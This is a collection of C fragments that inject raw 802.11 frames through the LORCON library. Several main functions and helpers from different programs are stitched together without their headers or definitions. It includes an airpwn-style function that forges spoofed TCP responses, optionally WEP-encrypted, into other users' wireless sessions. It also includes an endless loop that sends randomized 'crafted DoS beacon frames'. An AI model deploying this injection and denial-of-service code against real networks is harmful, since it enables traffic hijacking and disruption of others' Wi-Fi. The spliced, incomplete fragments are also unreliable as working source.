void send_beacon(__le16 seq)
{
int ret;
packet->seq = seq;
ret = tx80211_txpacket(&tx, &tx_packet);
if (ret < 0) {
fprintf(stderr, "Unable to transmit packet: %s\n",
tx.errstr);
exit(1);
}
}
static VALUE lorcon_device_write(int argc, VALUE *argv, VALUE self) {
struct rldev *rld;
int ret = 0;
int cnt = 0;
int dly = 0;
VALUE rbbuff, rbcnt, rbdelay;
Data_Get_Struct(self, struct rldev, rld);
switch(rb_scan_args(argc, argv, "12", &rbbuff, &rbcnt, &rbdelay)) {
case 1:
rbdelay = INT2NUM(0);
case 2:
rbcnt = INT2NUM(1);
default:
break;
}
cnt = NUM2INT(rbcnt);
dly = NUM2INT(rbdelay);
rld->in_packet.packet = StringValuePtr(rbbuff);
rld->in_packet.plen = RSTRING(rbbuff)->len;
for (; cnt > 0; cnt--) {
ret = tx80211_txpacket(&rld->in_tx, &rld->in_packet);
if (ret < 0) {
rb_raise(rb_eRuntimeError, "Lorcon could not transmit packet: %s", tx80211_geterrstr(&rld->in_tx));
return(INT2NUM(ret));
}
if (dly > 0)
#ifdef _MSC_VER
Sleep(dly);
#else
usleep(dly);
#endif
}
return (rbcnt);
}
int main(int argc, char *argv[])
{
struct tx80211 in_tx;
struct tx80211_packet in_packet;
struct ifreq ifr;
int ret = 0, channel = 0, c = 0, ttfd = -1, intfd = -1, flags = 0;
int drivertype = INJ_NODRIVER;
char iface[16 + 1];
char tface[16 + 1];
char errstr[PCAP_ERRBUF_SIZE + 1];
pcap_t *pd;
const u_char *pcap_pkt;
struct pcap_pkthdr pcap_hdr;
memset(iface, 0, sizeof(iface));
memset(tface, 0, sizeof(tface));
while ((c = getopt(argc, argv, "i:t:d:c:")) != EOF) {
switch (c) {
case 'i':
strncpy(iface, optarg, sizeof(iface) - 1);
break;
case 't':
strncpy(tface, optarg, sizeof(tface) - 1);
break;
case 'd':
drivertype = tx80211_resolvecard(optarg);
break;
case 'c':
if (sscanf(optarg, "%d", &channel) != 1) {
fprintf(stderr,
"%s: Illegal channel on cmd line",
argv[0]);
usage();
return -1;
}
break;
default:
break;
}
}
if (!strlen(iface)) {
fprintf(stderr, "Must specify an interface name.\n");
usage();
return -1;
}
if (!strlen(tface)) {
fprintf(stderr, "Must specify a tuntap interface name.\n");
usage();
return -1;
}
if (drivertype == INJ_NODRIVER) {
fprintf(stderr, "Driver name not recognized.\n");
usage();
return -1;
}
if (tx80211_init(&in_tx, iface, drivertype) < 0) {
perror("tx80211_init");
return -1;
}
/* Create the tuntap device */
if ((ttfd = open("/dev/net/tun", O_RDWR)) < 0) {
perror("Could not open /dev/net/tun control file");
return -1;
}
memset(&ifr, 0, sizeof(ifr));
ifr.ifr_flags = (IFF_TAP | IFF_NO_PI);
strncpy(ifr.ifr_name, tface, sizeof(tface) - 1);
if (ioctl(ttfd, TUNSETIFF, (void *) &ifr) < 0) {
perror("Unable to create tuntap interface");
return -1;
}
/* bring the tuntap up */
if ((intfd = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
perror("Failed to create AF_INET socket");
return -1;
}
memset(&ifr, 0, sizeof(ifr));
strncpy(ifr.ifr_name, tface, IFNAMSIZ);
if (ioctl(intfd, SIOCGIFFLAGS, &ifr) < 0) {
perror("Failed to get interface flags for tuntap");
return -1;
}
flags = ifr.ifr_flags;
flags |= (IFF_UP | IFF_RUNNING | IFF_PROMISC);
ifr.ifr_flags = flags;
if (ioctl(intfd, SIOCSIFFLAGS, &ifr) < 0) {
perror("Failed to set interface flags for tuntap");
return -1;
}
close(intfd);
/* Set monitor mode */
ret = tx80211_setmode(&in_tx, IW_MODE_MONITOR);
if (ret != 0) {
fprintf(stderr, "Error setting mode, returned %d.\n", ret);
return 1;
}
/* Switch to the given channel */
ret = tx80211_setchannel(&in_tx, channel);
if (ret < 0) {
fprintf(stderr, "Error setting channel, returned %d.\n", ret);
return 1;
}
/* Open the interface to get a socket */
ret = tx80211_open(&in_tx);
if (ret < 0) {
fprintf(stderr, "Unable to open interface %s.\n", in_tx.ifname);
return 1;
}
/* Open the pcap interface */
pd = pcap_open_live(tface, MAX_PACKET_LEN, 1, 1000, errstr);
if (pd == NULL) {
perror("Failed to open tuntap with pcap");
fprintf(stderr, "%s\n", errstr);
return 1;
}
fprintf(stderr, "Linked %s to %s, waiting for packets...\n", tface, iface);
while (1) {
if ((pcap_pkt = pcap_next(pd, &pcap_hdr)) == NULL) {
pcap_perror(pd, "Failed to get next packet from tuntap");
break;
}
in_packet.packet = (u_char *) pcap_pkt;
in_packet.plen = pcap_hdr.caplen;
ret = tx80211_txpacket(&in_tx, &in_packet);
if (ret < 0) {
fprintf(stderr, "Unable to transmit packet, returned %d.\n", ret);
perror("tx80211_txpacket");
break;
}
}
tx80211_close(&in_tx);
return 0;
}
int main(int argc, char** argv)
{
uint32_t send_sec;
uint32_t packet_size;
struct lorcon_packet *packet;
uint32_t i;
int32_t ret;
uint32_t mode;
uint32_t delay_us;
struct timespec start, now;
int32_t diff;
/* Parse arguments */
if (argc > 5) {
printf("Usage: random_packets <number> <length> <mode: 0=my MAC, 1=injection MAC> <delay in us>\n");
return 1;
}
if (argc < 5 || (1 != sscanf(argv[4], "%u", &delay_us))) {
delay_us = 0;
}
if (argc < 4 || (1 != sscanf(argv[3], "%u", &mode))) {
mode = 0;
printf("Usage: random_packets <number> <length> <mode: 0=my MAC, 1=injection MAC> <delay in us>\n");
} else if (mode > 1) {
printf("Usage: random_packets <number> <length> <mode: 0=my MAC, 1=injection MAC> <delay in us>\n");
return 1;
}
if (argc < 3 || (1 != sscanf(argv[2], "%u", &packet_size)))
packet_size = 2200;
if (argc < 2 || (1 != sscanf(argv[1], "%u", &send_sec)))
send_sec = 10000;
/* Generate packet payloads */
//printf("Generating packet payloads \n");
payload_buffer = malloc(PAYLOAD_SIZE);
if (payload_buffer == NULL) {
perror("malloc payload buffer");
exit(1);
}
generate_payloads(payload_buffer, PAYLOAD_SIZE);
/* Setup the interface for lorcon */
//printf("Initializing LORCON\n");
init_lorcon();
/* Allocate packet */
packet = malloc(sizeof(*packet) + packet_size);
if (!packet) {
perror("malloc packet");
exit(1);
}
packet->fc = (0x08 /* Data frame */
| (0x0 << 8) /* Not To-DS */);
packet->dur = 0xffff;
if (mode == 0) {
memcpy(packet->addr1, "\x00\x16\xea\x12\x34\x56", 6);
get_mac_address(packet->addr2, "mon1");
memcpy(packet->addr3, "\x00\x16\xea\x12\x34\x56", 6);
} else if (mode == 1) {
memcpy(packet->addr1, "\x00\x16\xea\x12\x34\x56", 6);
memcpy(packet->addr2, "\x00\x16\xea\x12\x34\x56", 6);
memcpy(packet->addr3, "\xff\xff\xff\xff\xff\xff", 6);
}
packet->seq = 0;
tx_packet.packet = (uint8_t *)packet;
tx_packet.plen = sizeof(*packet) + packet_size;
/* Send packets */
//printf("Sending packets of size %u for %d sec...\n", packet_size, send_sec);
if (delay_us) {
/* Get start time */
clock_gettime(CLOCK_MONOTONIC, &start);
}
i = 0;
int cur_sec = 0;
double cur_pkt_msec = 0;
clock_gettime(CLOCK_MONOTONIC, &start);
clock_gettime(CLOCK_MONOTONIC, &now);
//for (i = 0; i < send_sec; ++i) {
while(cur_sec < send_sec) {
payload_memcpy(packet->payload, packet_size,
(i*packet_size) % PAYLOAD_SIZE);
clock_gettime(CLOCK_MONOTONIC, &now);
int sub_time = (int)(now.tv_nsec * 1e-9 + now.tv_sec - start.tv_nsec * 1e-9 - start.tv_sec);
if (sub_time > cur_sec) {
cur_sec = sub_time;
//printf("time: %d\n", (now.tv_nsec - start.tv_nsec) * 1e-9);
printf("time now: %d\n", cur_sec);
}
/*
double sub_pkt_msec = (now.tv_nsec - start.tv_nsec) / 1e6 + (now.tv_sec - start.tv_sec) * 1e3;
if (sub_pkt_msec > cur_pkt_msec + 0.25) {
cur_pkt_msec = sub_pkt_msec;
} else {
continue;
}
*/
if (delay_us) {
clock_gettime(CLOCK_MONOTONIC, &now);
diff = (now.tv_sec - start.tv_sec) * 1000000 +
(now.tv_nsec - start.tv_nsec + 500) / 1000;
diff = delay_us*i - diff;
if (diff > 0 && diff < delay_us)
usleep(diff);
}
ret = tx80211_txpacket(&tx, &tx_packet);
if (ret < 0) {
fprintf(stderr, "Unable to transmit packet: %s\n",
tx.errstr);
exit(1);
}
i++;
if (((i+1) % 1000) == 0) {
//printf(".");
fflush(stdout);
}
if (((i+1) % 50000) == 0) {
//printf("%dk\n", (i+1)/1000);
fflush(stdout);
}
}
printf("total packet sent: %d\n", i);
return 0;
}
/**
* Function to inject TCP packets to the wireless interface. Requires headers
* from a TO_DS packet for use in crafting the FROM_DS response.
*/
void inject_tcp(airpwn_ctx *ctx,
ieee80211_hdr *w_hdr,
struct iphdr *ip_hdr,
struct tcphdr *tcp_hdr,
uint8_t *wepkey,
uint32_t keylen,
char *content,
uint32_t contentlen,
uint8_t tcpflags,
uint32_t *seqnum)
{
// libnet wants the data in host-byte-order
u_int ack = ntohl(tcp_hdr->seq) +
( ntohs(ip_hdr->tot_len) - ip_hdr->ihl * 4 - tcp_hdr->doff * 4 );
ctx->tcp_t = libnet_build_tcp(
ntohs(tcp_hdr->dest), // source port
ntohs(tcp_hdr->source), // dest port
*seqnum, // sequence number
ack, // ack number
tcpflags, // flags
0xffff, // window size
0, // checksum
0, // urg ptr
20 + contentlen, // total length of the TCP packet
(uint8_t*)content, // response
contentlen, // response_length
ctx->lnet, // libnet_t pointer
ctx->tcp_t // ptag
);
if(ctx->tcp_t == -1){
printf("libnet_build_tcp returns error: %s\n", libnet_geterror(ctx->lnet));
return;
}
ctx->ip_t = libnet_build_ipv4(
40 + contentlen, // length
0, // TOS bits
1, // IPID (need to calculate)
0, // fragmentation
0xff, // TTL
6, // protocol
0, // checksum
ip_hdr->daddr, // source address
ip_hdr->saddr, // dest address
NULL, // response
0, // response length
ctx->lnet, // libnet_t pointer
ctx->ip_t // ptag
);
if(ctx->ip_t == -1){
printf("libnet_build_ipv4 returns error: %s\n", libnet_geterror(ctx->lnet));
return;
}
// copy the libnet packets to to a buffer to send raw..
unsigned char packet_buff[0x10000];
memcpy(packet_buff, w_hdr, IEEE80211_HDR_LEN);
ieee80211_hdr *n_w_hdr = (ieee80211_hdr *)packet_buff;
// set the FROM_DS flag and swap MAC addresses
n_w_hdr->flags = IEEE80211_FROM_DS;
if(wepkey)
n_w_hdr->flags |= IEEE80211_WEP_FLAG;
n_w_hdr->llc.type = LLC_TYPE_IP;
uint8_t tmp_addr[6];
memcpy(tmp_addr, n_w_hdr->addr1, 6);
memcpy(n_w_hdr->addr1, n_w_hdr->addr2, 6);
memcpy(n_w_hdr->addr2, tmp_addr, 6);
u_int32_t packet_len;
u_int8_t *lnet_packet_buf;
// cull_packet will dump the packet (with correct checksums) into a
// buffer for us to send via the raw socket
if(libnet_adv_cull_packet(ctx->lnet, &lnet_packet_buf, &packet_len) == -1){
printf("libnet_adv_cull_packet returns error: %s\n",
libnet_geterror(ctx->lnet));
return;
}
memcpy(packet_buff + IEEE80211_HDR_LEN, lnet_packet_buf, packet_len);
libnet_adv_free_packet(ctx->lnet, lnet_packet_buf);
// total packet length
int len = IEEE80211_HDR_LEN + 40 + contentlen;
if(wepkey){
uint8_t tmpbuf[0x10000];
/* encryption starts after the 802.11 header, but the LLC header
* gets encrypted. */
memcpy(tmpbuf, packet_buff+IEEE80211_HDR_LEN_NO_LLC,
len-IEEE80211_HDR_LEN_NO_LLC);
len = wep_encrypt(tmpbuf, packet_buff+IEEE80211_HDR_LEN_NO_LLC,
len-IEEE80211_HDR_LEN_NO_LLC, wepkey, keylen);
if(len <= 0){
fprintf(stderr, "Error performing WEP encryption!\n");
return;
} else
len += IEEE80211_HDR_LEN_NO_LLC;
}
/* Establish lorcon packet transmission structure */
ctx->in_packet.packet = packet_buff;
ctx->in_packet.plen = len;
/* Send the packet */
if (tx80211_txpacket(&ctx->inject_tx, &ctx->in_packet) < 0) {
fprintf(stderr, "Unable to transmit packet.");
perror("tx80211_txpacket");
return;
}
*seqnum += contentlen; //advance the sequence number
printlog(ctx, 2, "wrote %d bytes to the wire(less)\n", len);
}
int main(int argc, char** argv)
{
uint8_t *payload_buffer;
uint32_t num_packets = 0;
uint32_t packet_size = 0;
uint32_t payload_size = 0;
char *file_path;
struct lorcon_packet *packet;
uint32_t i;
int32_t ret;
uint32_t mode;
uint32_t delay_us;
struct timespec start, now;
int32_t diff;
/* Parse arguments */
if (argc > 4) {
printf("Usage: random_packets <file_name> <mode: 0=my MAC, 1=injection MAC> <delay in us>\n");
return 1;
}
if (argc < 4 || (1 != sscanf(argv[3], "%u", &delay_us))) {
delay_us = 0;
}
if (argc < 3 || (1 != sscanf(argv[2], "%u", &mode))) {
mode = 0;
} else if (mode > 1) {
printf("Usage: random_packets <file_name> <mode: 0=my MAC, 1=injection MAC> <delay in us>\n");
return 1;
}
if (argc < 2 || strlen(argv[1]) == 0) {
printf("Usage: random_packets <file_name> <mode: 0=my MAC, 1=injection MAC> <delay in us>\n");
return 1;
} else {
file_path = argv[1];
}
/* Generate packet payloads */
printf("Generating packet payload from file: %s \n", file_path);
generate_payload_from_file(file_path, &payload_buffer, &payload_size);
printf("Read payload, size is: %d\n", payload_size);
// Set packet size and number of packets
if (payload_size > MAX_PACKET_SIZE) {
packet_size = MAX_PACKET_SIZE;
num_packets = ceil((float) payload_size / (float) MAX_PACKET_SIZE);
} else {
packet_size = payload_size;
num_packets = 1;
}
/* Setup the interface for lorcon */
printf("Initializing LORCON\n");
init_lorcon();
/* Allocate packet */
packet = malloc(sizeof(*packet) + packet_size);
if (!packet) {
perror("malloc packet");
exit(1);
}
packet->fc = (0x08 /* Data frame */
| (0x0 << 8) /* Not To-DS */);
packet->dur = 0xffff;
if (mode == 0) {
memcpy(packet->addr1, "\x00\x16\xea\x12\x34\x56", 6);
get_mac_address(packet->addr2, "mon0");
memcpy(packet->addr3, "\x00\x16\xea\x12\x34\x56", 6);
} else if (mode == 1) {
memcpy(packet->addr1, "\x00\x16\xea\x12\x34\x56", 6);
memcpy(packet->addr2, "\x00\x16\xea\x12\x34\x56", 6);
memcpy(packet->addr3, "\xff\xff\xff\xff\xff\xff", 6);
}
packet->seq = 0;
tx_packet.packet = (uint8_t *)packet;
tx_packet.plen = sizeof(*packet) + packet_size;
/* Send packets */
printf("Sending %u packets of size %u (. every thousand)\n", num_packets, packet_size);
if (delay_us) {
/* Get start time */
clock_gettime(CLOCK_MONOTONIC, &start);
}
for (i = 0; i < num_packets; ++i) {
if (i == (num_packets - 1)) {
printf("final packet size: %d\n", (payload_size - i * packet_size));
memcpy(packet->payload, (payload_buffer + (i * packet_size)), (payload_size - i * packet_size));
tx_packet.plen = sizeof(*packet) + (payload_size - i * packet_size);
} else {
memcpy(packet->payload, (payload_buffer + (i * packet_size)), packet_size);
}
if (delay_us) {
clock_gettime(CLOCK_MONOTONIC, &now);
diff = (now.tv_sec - start.tv_sec) * 1000000 +
(now.tv_nsec - start.tv_nsec + 500) / 1000;
diff = delay_us*i - diff;
if (diff > 0 && diff < delay_us)
usleep(diff);
}
ret = tx80211_txpacket(&tx, &tx_packet);
if (ret < 0) {
fprintf(stderr, "Unable to transmit packet: %s\n",
tx.errstr);
exit(1);
}
if (((i+1) % 1000) == 0) {
printf(".");
fflush(stdout);
}
if (((i+1) % 50000) == 0) {
printf("%dk\n", (i+1)/1000);
fflush(stdout);
}
}
return 0;
}
int
main(int argc, char **argv)
{
struct tx80211 tx;
struct tx80211_packet pkt;
char p1[BEACON_NOSSID_LEN];
char p2[BEACON_SSID_LEN];
int ret, drivertype;
uint8_t randbyte;
if (argc < 3) {
usage(argv);
return 0;
}
printf("[+] Initializing interface %s...\n", argv[1]);
drivertype = tx80211_resolvecard(argv[2]);
if (drivertype == INJ_NODRIVER) {
printf("[-] Driver name not recognized.\n");
exit(1);
}
ret = tx80211_init(&tx, argv[1], drivertype);
if (ret < 0) {
printf("[-] Error initializing %s/%s", argv[1], argv[2]);
exit(1);
}
ret = tx80211_setfunctionalmode(&tx, TX80211_FUNCMODE_INJMON);
if (ret != 0) {
printf("[-] Error setting monitor mode.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
ret = tx80211_setchannel(&tx, 11);
if (ret < 0) {
printf("[-] Error setting channel.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
ret = tx80211_open(&tx);
if (ret < 0) {
printf("[-] Unable to open interface %s\n", tx.ifname);
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
srand(time(NULL));
memcpy(p1, BEACON_NOSSID, BEACON_NOSSID_LEN);
memcpy(p2, BEACON_SSID, BEACON_SSID_LEN);
printf("[+] Injecting crafted DoS beacon frames...\n");
while (1) {
randbyte = rand() & 0xff;
p1[15] = randbyte;
p1[21] = randbyte;
p2[15] = randbyte;
p2[21] = randbyte;
pkt.packet = p1;
pkt.plen = BEACON_NOSSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
pkt.packet = p2;
pkt.plen = BEACON_SSID_LEN;
if (tx80211_txpacket(&tx, &pkt) < 0) {
printf("[-] Unable to transmit packet.\n");
printf("[-] %s.\n", tx80211_geterrstr(&tx));
exit(1);
}
}
tx80211_close(&tx);
return 0;
}
